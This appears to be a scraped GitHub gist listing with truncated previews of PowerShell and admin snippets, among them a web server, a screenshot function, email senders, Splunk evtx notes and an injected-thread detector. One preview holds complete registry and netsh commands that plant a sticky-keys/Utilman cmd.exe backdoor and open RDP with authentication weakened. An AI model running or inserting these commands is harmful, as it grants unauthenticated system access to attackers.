This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Rotates a vertical set similar to an Excel PivotTable | |
# | |
# Given $data in the format: | |
# | |
# Category Activity Duration | |
# ------------ ------------ -------- | |
# Management Email 1 | |
# Management Slides 4 | |
# Project A Email 2 | |
# Project A Research 1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[CmdletBinding()] | |
param ( | |
[Parameter(Mandatory=$true)] | |
[string] | |
$ComputerName, | |
[int] | |
$Port = 443 | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.SYNOPSIS | |
Start a web server that will route requests to a series of script blocks as defined by the -Routes parameter. | |
.DESCRIPTION | |
Starts a single-threaded web server and responds to requests by executing the script blocks that are | |
defined as routes on the command line. | |
.NOTES | |
Copyright 2013 Chris Duck |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-ScreenShot | |
{ | |
[CmdletBinding()] | |
param( | |
[parameter(Position = 0, Mandatory = 0, ValueFromPipelinebyPropertyName = 1)] | |
[ValidateNotNullOrEmpty()] | |
[string]$OutPath = "$env:USERPROFILE\Documents\ScreenShot", | |
#screenshot_[yyyyMMdd_HHmmss_ffff].png | |
[parameter(Position = 1, Mandatory = 0, ValueFromPipelinebyPropertyName = 1)] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function Send-EMailMessage { | |
[CmdletBinding()] | |
param( | |
[Parameter(Position=1, Mandatory=$true)] | |
[String[]] | |
$To, | |
[Parameter(Position=2, Mandatory=$false)] | |
[String[]] | |
$CcRecipients, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1. Parse evtx logs with evtxdump.py (https://github.com/williballenthin/python-evtx) | |
2. Create custom Splunk sourcetype "winevtx": | |
Edit $SPLUNK_HOME/etc/system/local/props.conf | |
[winevtx] | |
NO_BINARY_CHECK = 1 | |
SHOULD_LINEMERGE = true | |
BREAK_ONLY_BEFORE = ^\<Event xmlns= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.Synopsis | |
Registers a HTTP prefix and listens for a HttpRequest | |
.DESCRIPTION | |
Simple PowerShell HTTP Server implementation to respond to a single HTTP request | |
.EXAMPLE | |
Get-HttpRequest -UriPrefix "http://+:80/TestUri/" -ResponseData (Get-Content C:\inetpub\wwwroot\index.html) | |
.EXAMPLE | |
Get-HttpRequest -UriPrefix "http://127.0.0.1/" -ResponseData "It Works...!" -ShowRequest | |
#> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f | |
netsh firewall set service type = remotedesktop mode = enable | |
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes | |
net start TermService |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function Send-EWSEmail | |
{ | |
<# | |
.SYNOPSIS | |
Sends email via Exchange Web Services | |
.DESCRIPTION | |
Must be run with parameters | |
.PARAMETER Username |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-InjectedThread | |
{ | |
<# | |
.SYNOPSIS | |
Looks for threads that were created as a result of code injection. | |
.DESCRIPTION | |
OlderNewer